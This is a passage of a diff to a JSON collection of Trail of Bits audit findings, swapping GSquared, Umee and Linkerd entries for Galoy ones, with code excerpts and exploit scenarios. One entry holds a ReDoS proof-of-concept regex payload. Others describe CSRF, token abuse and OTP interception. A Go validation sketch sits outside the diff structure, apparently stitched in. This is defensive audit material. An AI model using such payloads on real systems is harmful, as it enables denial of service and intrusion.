minAmount. The GVault contract calls the ConvexStrategy contract to withdraw some funds to meet the necessary withdrawal amount.
The strategy attempts to divest the necessary amount of funds. However, due to the incorrect slippage arithmetic, the divest function reverts and Alice's withdrawal is unsuccessful. Recommendations Short term, in divest, multiply meta_amount by ratio. In invest, multiply amount by ratio. Long term, expand the unit test suite to cover additional edge cases and to ensure that the system behaves as expected.", + "title": "26. Insufficient validation of genesis parameters ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "A few system parameters must be set correctly for the system to function properly. The system checks the parameter input against minimum and maximum values (not always correctly) but does not check the correctness of the parameters' dependencies. Exploit Scenario When preparing a protocol upgrade, the Umee team accidentally introduces an invalid value into the configuration file. As a result, the upgrade is deployed with an invalid or unexpected parameter. Recommendations Short term, implement proper validation of configurable values to ensure that the following expected invariants hold: BaseBorrowRate <= KinkBorrowRate <= MaxBorrowRate LiquidationIncentive <= some maximum CompleteLiquidationThreshold > 0 (The third invariant is meant to prevent division by zero in the Interpolate method; a sketch of these checks appears below.)", "labels": [ "Trail of Bits", "Severity: Low", "Difficulty: High" ] }, { - "title": "14. Potential division by zero in _calcTrancheValue ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", - "body": "Junior tranche withdrawals may fail due to an unexpected division by zero error. One of the key steps performed during junior tranche withdrawals is to identify the dollar value of the tranche tokens that will be burned by calling _calcTrancheValue (figure 14.1). function _calcTrancheValue(bool _tranche, uint256 _amount, uint256 _total) public view returns (uint256) { uint256 factor = getTrancheToken(_tranche).factor(_total); uint256 amount = (_amount * DEFAULT_FACTOR) / factor; if (amount > _total) return _total; return amount; } Figure 14.1: The _calcTrancheValue function in GTranche.sol#L559-568 To calculate the dollar value, the factor function is called to identify how many tokens represent one dollar. The dollar value, amount, is then the token amount provided, _amount, divided by factor. However, an edge case in the factor function will occur if the total supply of tranche tokens (junior or senior) is non-zero while the amount of assets backing those tokens is zero. Practically, this can happen only if the system is exposed to a loss large enough that the assets backing the junior tranche tokens are completely wiped. In this edge case, the factor function returns zero (figure 14.2). The subsequent division by zero in _calcTrancheValue will cause the transaction to revert.
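A minimal sketch of the invariant checks recommended in finding 26 above; the Params fields and their types are illustrative, not Umee's actual definitions:

package keeper

import "fmt"

type Params struct {
	BaseBorrowRate               float64
	KinkBorrowRate               float64
	MaxBorrowRate                float64
	LiquidationIncentive         float64
	CompleteLiquidationThreshold float64
}

// Validate enforces the dependencies between parameters rather than only
// their individual ranges.
func (p Params) Validate() error {
	if !(p.BaseBorrowRate <= p.KinkBorrowRate && p.KinkBorrowRate <= p.MaxBorrowRate) {
		return fmt.Errorf("borrow rates must satisfy base <= kink <= max")
	}
	if p.LiquidationIncentive > 1.0 { // assumed cap of 100%
		return fmt.Errorf("liquidation incentive above maximum")
	}
	if p.CompleteLiquidationThreshold <= 0 {
		return fmt.Errorf("complete liquidation threshold must be positive (avoids division by zero in Interpolate)")
	}
	return nil
}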
function factor(uint256 _totalAssets) public view override returns (uint256) { if (totalSupplyBase() == 0) { return getInitialBase(); } if (_totalAssets > 0) { return totalSupplyBase().mul(BASE).div(_totalAssets); } // This case is totalSupply > 0 && totalAssets == 0, and only occurs on system loss return 0; } Figure 14.2: The factor function in GToken.sol#L525-541 It is important to note that if the system enters a state where there are no assets backing the junior tranche, junior tranche token holders would be unable to withdraw anyway. However, this division by zero should be caught in _calcTrancheValue, and the requisite error code should be thrown. Recommendations Short term, add a check before the division to ensure that factor is greater than zero. If factor is zero, throw a custom error code specifically created for this situation. Long term, expand the unit test suite to cover additional edge cases and to ensure that the system behaves as expected.", + "title": "31. Lack of prioritization of Peggo orchestrator messages ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "Peggo orchestrator messages, like oracle messages (TOB-UMEE-20), are not prioritized over other transactions for inclusion in a block. As a result, if the network is highly congested, orchestrator transactions may not be included in the earliest possible block. Although the Umee system could increase the fee charged for including a Peggo orchestrator message in a block, that solution is suboptimal and may not work. Tactics for prioritizing important transactions include the following: using the custom CheckTx implementation introduced in Tendermint version 0.35, which returns a priority argument; reimplementing part of the Tendermint engine, as Terra Money did; and using Substrate's dispatch classes, which allow developers to mark transactions as normal, operational, or mandatory. Exploit Scenario A user sends tokens from Ethereum to Umee by calling Gravity Bridge's sendToCosmos function. When validators notice the transaction in the Ethereum logs, they send MsgSendToCosmosClaim messages to Umee. However, 34% of the messages are front-run by an attacker, effectively stopping Umee from acknowledging the token transfer. Recommendations Short term, use a custom CheckTx method to prioritize Peggo orchestrator messages. Long term, ensure that operations that affect the whole system cannot be front-run or delayed by attackers or blocked by network congestion.", "labels": [ "Trail of Bits", "Severity: Undetermined", "Difficulty: Medium" ] }, { - "title": "15. Token withdrawals from GTranche are sent to the incorrect address ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", - "body": "The GTranche withdrawal function takes in a _recipient address to send the G3CRV shares to, but instead sends those shares to msg.sender (figure 15.1). function withdraw(uint256 _amount, uint256 _index, bool _tranche, address _recipient) external override returns (uint256 yieldTokenAmounts, uint256 calcAmount) { trancheToken.burn(msg.sender, factor, calcAmount); token.transfer(msg.sender, yieldTokenAmounts); [...]
emit LogNewWithdrawal(msg.sender, _recipient, _amount, _index, _tranche, yieldTokenAmounts, calcAmount); return (yieldTokenAmounts, calcAmount); } Figure 15.1: The withdraw function in GTranche.sol#L219-259 Since GTranche withdrawals are performed by the GRouter contract on behalf of the user, the msg.sender and _recipient address are the same. However, a direct call to GTranche.withdraw by a user could lead to unexpected consequences. Recommendations Short term, change the destination address to _recipient instead of msg.sender. Long term, increase unit test coverage to include tests directly on GTranche and associated contracts in addition to performing the unit tests through the GRouter contract.", + "title": "32. Failure of a single broadcast Ethereum transaction causes a batch-wide failure ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "The Peggo orchestrator broadcasts Ethereum events as Cosmos messages and sends them in batches of 10 (at least by default). According to a code comment (figure 32.1), if the execution of a single message fails on the Umee side, all of the other messages in the batch will also be ignored. We set the severity of this finding to undetermined because it is unclear whether it is exploitable. // runTx processes a transaction within a given execution mode, encoded transaction // bytes, and the decoded transaction itself. All state transitions occur through // a cached Context depending on the mode provided. State only gets persisted // if all messages get executed successfully and the execution mode is DeliverTx. // Note, gas execution info is always returned. A reference to a Result is // returned if the tx does not run out of gas and if all the messages are valid // and execute successfully. An error is returned otherwise. func (app *BaseApp) runTx(mode runTxMode, txBytes []byte, tx sdk.Tx) (gInfo sdk.GasInfo, result *sdk.Result, err error) { Figure 32.1: cosmos-sdk/v0.45.1/baseapp/baseapp.go#L568-L575 Recommendations Short term, review the practice of ignoring an entire batch of Peggo-broadcast Ethereum events when the execution of one of them fails on the Umee side, and ensure that it does not create a denial-of-service risk. Alternatively, change the system such that it can identify any messages that will fail and exclude them from the batch. Long term, generate random messages corresponding to Ethereum events and use them in testing to check the system's handling of failed messages.", "labels": [ "Trail of Bits", "Severity: Undetermined", "Difficulty: High" ] }, { - "title": "16. Solidity compiler optimizations can be problematic ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", - "body": "The GSquared Protocol contracts have enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed. Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. Security issues due to optimization bugs have occurred in the past. A medium- to high-severity bug in the Yul optimizer was introduced in Solidity version 0.8.13 and was fixed only recently, in Solidity version 0.8.17.
Another medium-severity optimization bug, one that caused memory writes in inline assembly blocks to be removed under certain conditions, was patched in Solidity 0.8.15. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe. It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizations causes a security vulnerability in the GSquared Protocol contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", + "title": "1. Insecure download process for the yq tool ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", + "body": "The Dockerfile uses the Wget utility to download the yq tool but does not verify the file it has downloaded by its checksum or signature. Without verification, an archive that has been corrupted or modified by a malicious third party may not be detected. Figures 1.1 and 1.2 show cases in which a tool is downloaded without verification of its checksum. RUN wget https://github.com/mikefarah/yq/releases/download/v4.17.2/yq_linux_386.tar.gz -O - | \\ tar xz && mv yq_linux_386 /usr/bin/yq Figure 1.1: The Dockerfile downloads and unarchives the yq tool. (ci/image/Dockerfile#6-7) wget https://github.com/bodymindarts/cepler/releases/download/v${cepler_version}/cepler-x86_64-unknown-linux-musl-${cepler_version}.tar.gz \\ && tar -zxvf cepler-x86_64-unknown-linux-musl-${cepler_version}.tar.gz \\ && mv cepler-x86_64-unknown-linux-musl-${cepler_version}/cepler /usr/local/bin \\ && chmod +x /usr/local/bin/cepler \\ && rm -rf ./cepler-* Figure 1.2: The bastion-startup script downloads and unarchives the cepler tool. (modules/inception/gcp/bastion-startup.tmpl#41-45) Exploit Scenario An attacker gains access to the GitHub repository from which yq is downloaded. The attacker then modifies the binary to create a reverse shell upon yq's startup. When a user runs the Dockerfile, the attacker gains access to the user's container. Recommendations Short term, have the Dockerfile and other scripts in the solution verify each file they download by its checksum. Long term, implement checks to ensure the integrity of all third-party components used in the solution and periodically check that all components are downloaded from encrypted URLs.", "labels": [ "Trail of Bits", "Severity: Low", @@ -2852,9 +5600,9 @@ ] }, { - "title": "1. Lack of rate-limiting mechanisms in the identity service ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", - "body": "The identity service issues signed certificates to sidecar proxies within Linkerd-integrated infrastructure. When proxies initialize for the first time, they request a certificate from the identity service. However, the identity service lacks sufficient rate-limiting mechanisms, which may make it prone to denial-of-service attacks. Because identity controllers are shared among pods in a cluster, a denial of service of an identity controller may affect the availability of applications across the cluster. Threat Scenario An attacker obtains access to the sidecar proxy in one of the user application namespaces.
Due to the lack of rate-limiting mechanisms within the identity service, the proxy can now repeatedly request a newly signed certificate as if it were a proxy sidecar initializing for the first time. Recommendations Short term, add rate-limiting mechanisms to the identity service to prevent a single pod from requesting too many certificates or performing other computationally intensive actions. Long term, ensure that appropriate rate-limiting mechanisms exist throughout the infrastructure to prevent denial-of-service attacks. Where possible, implement stricter access controls to ensure that components cannot interact with APIs more than necessary. Additionally, ensure that the system sufficiently logs events so that an audit trail is available in the event of an attack.", + "title": "2. Use of unencrypted HTTP scheme ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", + "body": "The Galoy ipfetcher module uses the unencrypted HTTP scheme (figure 2.1). As a result, an attacker in the same network as the host invoking the code in figure 2.1 could intercept and modify both the request and ipfetcher's response to it, potentially accessing sensitive information. const { data } = await axios.get( `http://proxycheck.io/v2/${ip}?key=${PROXY_CHECK_APIKEY}&vpn=1&asn=1`, ) Figure 2.1: src/services/ipfetcher/index.ts#8-10 Exploit Scenario Eve gains access to Alice's network and obtains Alice's PROXY_CHECK_APIKEY by observing the unencrypted network traffic. Recommendations Short term, change the URL scheme used in the ipfetcher service to HTTPS. Long term, use tools such as WebStorm code inspections to find other uses of unencrypted URLs.", "labels": [ "Trail of Bits", "Severity: Low", "Difficulty: High" ] }, { - "title": "2. Lack of rate-limiting mechanisms in the destination service ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", - "body": "The destination service contains traffic-routing information for sidecar proxies within Linkerd-integrated infrastructure. However, the destination service lacks sufficient rate-limiting mechanisms, which may make it prone to denial-of-service attacks if a pod repeatedly changes its availability status. Because destination controllers are shared among pods in a cluster, a denial of service of a destination controller may affect the availability of applications across the cluster. Threat Scenario An attacker obtains access to the sidecar proxy in one of the user application namespaces. Due to the lack of rate-limiting mechanisms within the destination service, the proxy can now repeatedly request routing information or change its availability status to force updates in the controller. Recommendations Short term, add rate-limiting mechanisms to the destination service to prevent a single pod from requesting too much routing information or performing state updates too quickly. Long term, ensure that appropriate rate-limiting mechanisms exist throughout the infrastructure to prevent denial-of-service attacks. Where possible, implement stricter access controls to ensure that components cannot interact with APIs more than necessary. Additionally, ensure that the system sufficiently logs events so that an audit trail is available in the event of an attack.", + "title": "3.
Lack of expiration and revocation mechanism for JWTs ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", + "body": "The Galoy system uses JSON web tokens (JWTs) for authentication. A user obtains a new JWT by calling the userLogin GraphQL mutation. Once a token has been signed, it is valid forever; the platform does not set an expiration time for tokens and cannot revoke them. export const createToken = ({ uid, network, }: { uid: UserId network: BtcNetwork }): JwtToken => { return jwt.sign({ uid, network }, JWT_SECRET, { // (...) algorithm: "HS256", }) as JwtToken } Figure 3.1: The creation of a JWT (src/services/jwt.ts#7-27) Exploit Scenario An attacker obtains a user's JWT and gains persistent access to the system. The attacker then engages in destructive behavior. The victim eventually notices the behavior but does not have a way to stop it. Recommendations Short term, consider setting an expiration time for JWTs, and implement a mechanism for revoking tokens. That way, if a JWT is leaked, an attacker will not gain persistent access to the system.", "labels": [ "Trail of Bits", "Severity: Medium", "Difficulty: High" ] }, { - "title": "3. CLI tool allows the use of insecure protocols when externally sourcing infrastructure definitions ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", - "body": "When using the command-line interface (CLI) tool, an operator may source infrastructural YAML definitions from a URI path specifying any protocol, such as http:// or https://. Therefore, a user could expose sensitive information when using an insecure protocol such as HTTP. Furthermore, the Linkerd documentation does not warn users about the system's use of insecure protocols. Threat Scenario An infrastructure operator integrates Linkerd into her infrastructure. When doing so, she uses the CLI tool to fetch YAML definitions over HTTP. Unbeknownst to her, the use of HTTP has made her data visible to attackers on the local network. Her data is also prone to man-in-the-middle attacks. Recommendations Short term, disallow the use of insecure protocols within the CLI tool when sourcing external data. Alternatively, provide documentation and best practices regarding the use of insecure protocols when externally sourcing data within the CLI tool.", + "title": "4. Use of insecure function to generate phone codes ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", + "body": "The Galoy application generates a verification code by using the JavaScript function Math.random(), which is not a cryptographically secure pseudorandom number generator (CSPRNG). const randomIntFromInterval = (min, max) => Math.floor(Math.random() * (max - min + 1) + min) // (...)
const code = String(randomIntFromInterval(100000, 999999)) as PhoneCode const galoyInstanceName = getGaloyInstanceName() const body = `${code} is your verification code for ${galoyInstanceName}` const result = await PhoneCodesRepository().persistNew({ phone: phoneNumberValid, code, }) if (result instanceof Error) return result const sendTextArguments = { body, to: phoneNumberValid, logger } return TwilioClient().sendText(sendTextArguments) Figure 4.1: src/app/users/request-phone-code.ts#10-96 Exploit Scenario An attacker repeatedly generates verification codes and analyzes the values and the order of their generation. The attacker attempts to deduce the pseudorandom number generator's internal state. If successful, the attacker can then perform an offline calculation to predict future verification codes. Recommendations Short term, replace Math.random() with a CSPRNG. Long term, always use a CSPRNG to generate random values for cryptographic operations.", "labels": [ "Trail of Bits", "Severity: Low", "Difficulty: High" ] }, { - "title": "5. Go's pprof endpoints enabled by default in all admin servers ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", - "body": "All core components of the Linkerd infrastructure, in both the data and control planes, have an admin server with Go's server runtime profiler (pprof) endpoints on /debug/pprof enabled by default. These servers are not exposed to the rest of the cluster or to the local network by default. Threat Scenario An attacker scans the network in which a Linkerd cluster is configured and discovers that an operator forwarded the admin server port to the local network, exposing the pprof endpoints to the local network. He connects a profiler to it and gains access to debug information, which assists him in mounting further attacks. Recommendations Short term, add a check to http.go that enables pprof endpoints only when Linkerd runs in debug or test mode. Long term, audit all debug-related functionality to ensure it is not exposed when Linkerd is running in production mode. References Your pprof is showing: IPv4 scans reveal exposed net/http/pprof endpoints", + "title": "5. Redundant basic authentication method ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", + "body": "The Galoy application implements a basic authentication method (figure 5.1) that is redundant because the apiKey is not being used. Superfluous authentication methods create new attack vectors and should be removed from the codebase. import express from "express" const formatError = new Error("Format is Authorization: Basic ") export default async function ( req: express.Request, _res: express.Response, next: express.NextFunction, ) { const authorization = req.headers["authorization"] if (!authorization) return next() const parts = authorization.split(" ") if (parts.length !== 2) return next() const scheme = parts[0] if (!/Basic/i.test(scheme)) return next() const credentials = Buffer.
from(parts[1], "base64").toString().split(":") if (credentials.length !== 2) return next(formatError) const [apiKey, apiSecret] = credentials if (!apiKey || !apiSecret) return next(formatError) req["apiKey"] = apiKey req["apiSecret"] = apiSecret next() } Figure 5.1: The basic authentication method implementation (src/servers/middlewares/api-key-auth.ts#1-28) Recommendations Short term, remove the apiKey-related code. Long term, review and clearly document the Galoy authentication methods.", "labels": [ "Trail of Bits", "Severity: Informational", "Difficulty: High" ] }, { - "title": "6. Lack of access controls on the linkerd-viz dashboard ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", - "body": "Linkerd operators can enable a set of metrics-focused features by adding the linkerd-viz extension. Doing so enables a web UI dashboard that lists detailed information about the namespaces, services, pods, containers, and other resources in a Kubernetes cluster in which Linkerd is configured. Operators can enable Kubernetes role-based access controls to the dashboard; however, no access control options are provided by Linkerd. Threat Scenario An attacker scans the network in which a Linkerd cluster is configured and discovers an exposed UI dashboard. By accessing the dashboard, she gains valuable insight into the cluster. She uses the knowledge gained from exploring the dashboard to formulate attacks that would expand her access to the network. Recommendations Short term, document recommendations for restricting access to the linkerd-viz dashboard. Long term, add authentication and authorization controls for accessing the dashboard. This could be done by implementing tokens created via the CLI or client-side authorization logic.", + "title": "6. GraphQL queries may facilitate CSRF attacks ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", + "body": "The Galoy application's /graphql endpoint handles queries sent via GET requests. It is impossible to pass state-changing mutations or subscriptions in GET requests, and authorized queries need the Authorization: Bearer header. However, if a state-changing GraphQL operation were mislabeled as a query (typically a non-state-changing request), the endpoint would be vulnerable to cross-site request forgery (CSRF) attacks. Exploit Scenario An attacker creates a malicious website with JavaScript code that sends requests to the /graphql endpoint (figure 6.1). When a user visits the website, the JavaScript code is executed in the user's browser, changing the server's state.
Figure 6.1: In this proof-of-concept CSRF attack, the malicious website sends a request (the btcPriceList query) when the victim clicks Submit request. Recommendations Short term, disallow the use of the GET method to send queries, or enhance the CSRF protections for GET requests. Long term, identify all state-changing endpoints and ensure that they are protected by an authentication or anti-CSRF mechanism. Then implement tests for those endpoints. References Cross-Origin Resource Sharing, Mozilla documentation Cross-Site Request Forgery Prevention, OWASP Cheat Sheet Series", "labels": [ "Trail of Bits", "Severity: Low", "Difficulty: High" ] }, { - "title": "7. Prometheus endpoints reachable from the user application namespace ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", - "body": "The linkerd-viz extension provides a Prometheus API that collects metrics data from the various proxies and controllers used by the control and data planes. Metrics can include various labels with IP addresses, pod IDs, and port numbers. Threat Scenario An attacker gains access to a user application pod and calls the API directly to read Prometheus metrics. He uses the API to gain information about the cluster that aids him in expanding his access across the Kubernetes infrastructure. Recommendations Short term, disallow access to the Prometheus extension from the user application namespace. This could be done in the same manner in which access to the web dashboard is restricted from within the cluster (e.g., by allowing access only for specific hosts).", + "title": "7. Potential ReDoS risk ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", + "body": "The caseInsensitiveRegex function takes an input: string parameter and uses it to create a new RegExp object (figure 7.1). Users cannot currently control the input parameter (the regular expression) or the string; however, if users gain that ability as the code is developed, it may enable them to cause a regular expression denial of service (ReDoS). export const caseInsensitiveRegex = (input: string) => { return new RegExp(`^${input}$`, "i") } Figure 7.1: src/services/mongoose/users.ts#13-15 const findByUsername = async ( username: Username, ): Promise => { try { const result = await User.findOne( { username: caseInsensitiveRegex(username) }, Figure 7.2: src/services/mongoose/accounts.ts#37-42 Exploit Scenario An attacker registers an account with a specially crafted username (line 2, figure 7.3), which forms part of a regex. The attacker then finds a way to pass the malicious regex (line 1, figure 7.3) to the findByUsername function, causing a denial of service on a victim's machine. let test = caseInsensitiveRegex("(.*){1,32000}[bc]") let s = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!" s.match(test) Figure 7.3: A proof of concept for the ReDoS vulnerability Recommendations Short term, ensure that input passed to the caseInsensitiveRegex function is properly validated and sanitized.", "labels": [ "Trail of Bits", "Severity: Informational", "Difficulty: Low" ] }, { - "title": "8. Lack of egress access controls ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf", - "body": "Linkerd provides access control mechanisms for ingress traffic but not for egress traffic.
Egress controls would allow an operator to impose important restrictions, such as which external services and endpoints a meshed application running in the application namespace can communicate with. Threat Scenario A user application becomes compromised. As a result, the application code begins making outbound requests to malicious endpoints. The lack of access controls on egress traffic prevents infrastructure operators from mitigating the situation (e.g., by allowing the application to communicate with only a set of allowlisted external services). Recommendations Short term, add support for enforcing egress network policies. A GitHub issue to implement this recommendation already exists in the Linkerd repository.",
+ "title": "8. Use of MD5 to generate unique GeeTest identifiers ",
+ "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf",
+ "body": "The Galoy application uses MD5 hashing to generate a unique identifier during GeeTest service registration. MD5 is an insecure hash function and should never be used in a security-relevant context. 33 const register = async (): Promise => { 34 35 36 37 try { const gtLib = new GeetestLib(config.id, config.key) const digestmod = \"md5\" const params = { 38 digestmod, 39 client_type: \"native\" , 40 } 41 42 43 const bypasscache = await getBypassStatus() // not a cache let result if (bypasscache === \"success\" ) { 44 result = await gtLib.register(digestmod, params) Figure 8.1: src/services/geetest.ts#3344 Recommendations Short term, change the hash function used in the register function to a stronger algorithm that will not cause collisions, such as SHA-256. Long term, document all cryptographic algorithms used in the system, implement a policy governing their use, and create a plan for when and how to deprecate them.",
"labels": [
"Trail of Bits",
"Severity: Low",
@@ -2922,9 +5670,9 @@
]
},
{
- "title": "9. Prometheus endpoints are unencrypted and unauthenticated by default ",
- "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf",
- "body": "The linkerd-viz extension provides a Prometheus API that collects metrics data from the various proxies and controllers used by the control and data planes. However, this endpoint is unencrypted and unauthenticated, lacking access and confidentiality controls entirely. Threat Scenario An attacker gains access to a sibling component within the same namespace in which the Prometheus endpoint exists. Due to the lack of access controls, the attacker can now laterally obtain Prometheus metrics with ease. Additionally, due to the lack of confidentiality controls, such as those implemented through the use of cryptography, connections are exposed to other parties. Recommendations Short term, consider implementing access controls within Prometheus and Kubernetes to disallow access to the Prometheus metrics endpoint from any machine within the cluster that is irrelevant to Prometheus logging. Additionally, implement secure encryption of connections with the use of TLS within Prometheus or leverage existing Linkerd mTLS schemes.",
+ "title": "9. Reliance on SMS-based OTPs for authentication ",
+ "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf",
+ "body": "Galoy's authentication process is heavily reliant on the delivery of one-time passwords (OTPs) over SMS.
This authentication method contravenes best practices and should not be used in applications that handle financial transactions or other sensitive operations. SMS-based OTP leaves users vulnerable to multiple attacks and is considered an unsafe authentication method. Several of the most common and effective attack scenarios are described below. Text messages received by a mobile device can be intercepted by rogue applications on the device. Many users blindly authorize untrusted third-party applications to access their mobile phones' SMS databases; this means that a vulnerability in a third-party application could lead to the compromise and disclosure of the text messages on the device, including Galoy's SMS OTP messages. Another common technique used to target mobile finance applications is the interception of notifications on a device. Android operating systems, for instance, broadcast notifications across applications by design; a rogue application could subscribe to those notifications to access incoming text message notifications. Attackers also target SMS-based two-factor authentication and OTP implementations through SIM swapping . In short, an attacker uses social engineering to gather information about the owner of a SIM card and then, impersonating its owner, requests a new SIM card from the telecom company. All calls and text messages will then be sent to the attacker, leaving the original owner of the number out of the loop. This approach has been used in many recent attacks against crypto wallet owners, leading to millions of dollars in losses. Recommendations Short term, avoid using SMS authentication as anything other than an optional way to validate an account holder's identity and profile information. Instead of SMS-based OTP, provide support for hardware-based two-factor authentication methods such as Yubikey tokens, or software-based time-based one-time password (TOTP) implementations such as Google Authenticator and Authy. References What is a Sim Swap? Definition and Related FAQs, Yubico",
"labels": [
"Trail of Bits",
"Severity: Medium",
@@ -2932,9 +5680,9 @@
]
},
{
- "title": "10. Shared identity and destination services in a cluster pose risks to multi-application clusters ",
- "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf",
- "body": "The identity and destination controllers are meant to convey certificate and routing information for proxies, respectively. However, only one identity controller and one destination controller are deployed in a cluster, so they are shared among all application pods within a cluster. As a result, a single application pod could pollute records, causing denial-of-service attacks or otherwise compromising these cluster-wide components. Additionally, a compromise of these cluster-wide components may result in the exposure of routing information for each application pod. Although the Kubernetes API server is exposed with the same architecture, it may be beneficial to minimize the attack surface area and the data that can be exfiltrated from compromised Linkerd components. Threat Scenario An attacker gains access to a single user application pod and begins to launch attacks against the identity and destination services. As a result, these services cannot serve other user application pods. The attacker later finds a way to compromise one of these two services, allowing her to leak sensitive application traffic from other user application pods.
Recommendations Short term, implement per-pod identity and destination services that are isolated from other pods. If this is not viable, consider documenting this caveat so that users are aware of the risks of hosting multiple applications within a single cluster.",
+ "title": "10. Incorrect handling and implementation of SMS OTPs ",
+ "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf",
+ "body": "Users authenticate to the web panel by providing OTPs sent to them over SMS. We identified two issues in the OTP authentication implementation: 1. The generated OTPs are persistent because OTP expiration dates are calculated incorrectly. The Date.now() method returns the epoch time in milliseconds, whereas it is meant to return the time in seconds. 294 const PhoneCodeSchema = new Schema({ 295 created_at: { 296 297 type : Date , default: Date.now , 298 required: true , Figure 10.1: The default date value is expressed in milliseconds. ( src/services/mongoose/schema.ts#294298 ) 11 export const VALIDITY_TIME_CODE = ( 20 * 60 ) as Seconds Figure 10.2: The default validity period is expressed in seconds. ( src/config/index.ts#11 ) 49 50 51 const age = VALIDITY_TIME_CODE const validCode = await isCodeValid({ phone: phoneNumberValid , code, age }) if (validCode instanceof Error ) return validCode Figure 10.3: Validation of an OTP's age ( src/app/users/login.ts#4951 ) 18 }): Promise < true | RepositoryError> => { 19 20 21 const timestamp = Date .now() / 1000 - age try { const phoneCode = await PhoneCode.findOne({ 22 phone, 23 code, 24 created_at: { 25 $gte: timestamp , 26 }, Figure 10.4: The codebase validates the timestamp in seconds, while the default date is in milliseconds, as shown in figure 10.1. ( src/services/mongoose/phone-code.ts#1826 ) 2. The SMS OTPs are never discarded. When a new OTP is sent to a user, the old one remains valid regardless of its expiration time. A user's existing OTP tokens also remain valid if the user manually logs out of a session, which should not be the case. Tests of the admin-panel and web-wallet code confirmed that all SMS OTPs generated for a given phone number remain valid in these cases. Exploit Scenario After executing a successful phishing attack against a user, an attacker is able to intercept an OTP sent to that user, gaining persistent access to the victim's account. The attacker will be able to use the code even when the victim logs out of the session or requests a new OTP. Recommendations Short term, limit the lifetime of OTPs to two minutes. Additionally, immediately invalidate an OTP, even an unexpired one, when any of the following events occur: The user logs out of a session The user requests a new OTP The OTP is used successfully The OTP reaches its expiration time The user's account is locked for any reason (e.g., too many login attempts) References NIST best practices for implementing authentication tokens",
"labels": [
"Trail of Bits",
"Severity: High",
@@ -2942,9 +5690,9 @@
]
},
{
- "title": "11. Lack of isolation between components and their sidecar proxies ",
- "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-threatmodel.pdf",
- "body": "Within the Linkerd, linkerd-viz, and user application namespaces, each core component lives alongside a linkerd-proxy container, which proxies the component's traffic and provides mTLS for internal connections.
However, because the sidecar proxies are not isolated from their corresponding components, the compromise of a component would mean the compromise of its proxy, and vice versa. This is particularly interesting when considering the lack of access controls for some components, as detailed in TOB-LKDTM-4: proxy admin endpoints are exposed to the applications they are proxying, allowing metrics collection and shutdown requests to be made. Threat Scenario An attacker exploits a vulnerability to gain access to a linkerd-proxy instance. As a result, the attacker is able to compromise the confidentiality, integrity, and availability of lateral components, such as user applications, identity and destination services within the Linkerd namespace, and extensions within the linkerd-proxy namespace. Recommendations Short term, document system caveats and sensitivities so that operators are aware of them and can better defend themselves against attacks. Consider employing health checks that verify the integrity of proxies and other components to ensure that they have not been compromised. Long term, investigate ways to isolate sidecar proxies from the components they are proxying (e.g., by setting stricter access controls or leveraging isolated namespaces between proxied components and their sidecars).",
+ "title": "11. Vulnerable and outdated Node packages ",
+ "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf",
+ "body": "We used the yarn audit and snyk tools to audit the project dependencies and components for known vulnerabilities and outdated versions, respectively. The project uses many outdated packages with known security vulnerabilities ranging from critical to low severity. A list of vulnerable and outdated packages is included in appendix C . Vulnerabilities in packages imported by an application are not necessarily exploitable. In most cases, an affected method in a vulnerable package needs to be used in the right context to be exploitable. We manually reviewed the packages with high- or critical-severity vulnerabilities and did not find any vulnerabilities that could be exploited in the Galoy application. However, that could change as the code is further developed. Exploit Scenario An attacker fingerprints one of Galoy's components, identifies an out-of-date package with a known vulnerability, and uses it in an exploit against the component. Recommendations Short term, update the outdated and vulnerable dependencies. Long term, integrate static analysis tools that can detect outdated and vulnerable libraries (such as the yarn audit and snyk tools) into the build and/or test pipeline. This will improve the system's security posture and help prevent the exploitation of project dependencies.",
"labels": [
"Trail of Bits",
"Severity: Medium",
@@ -2952,9 +5700,9 @@
]
},
{
- "title": "12. Lack of centralized security best practices documentation ",
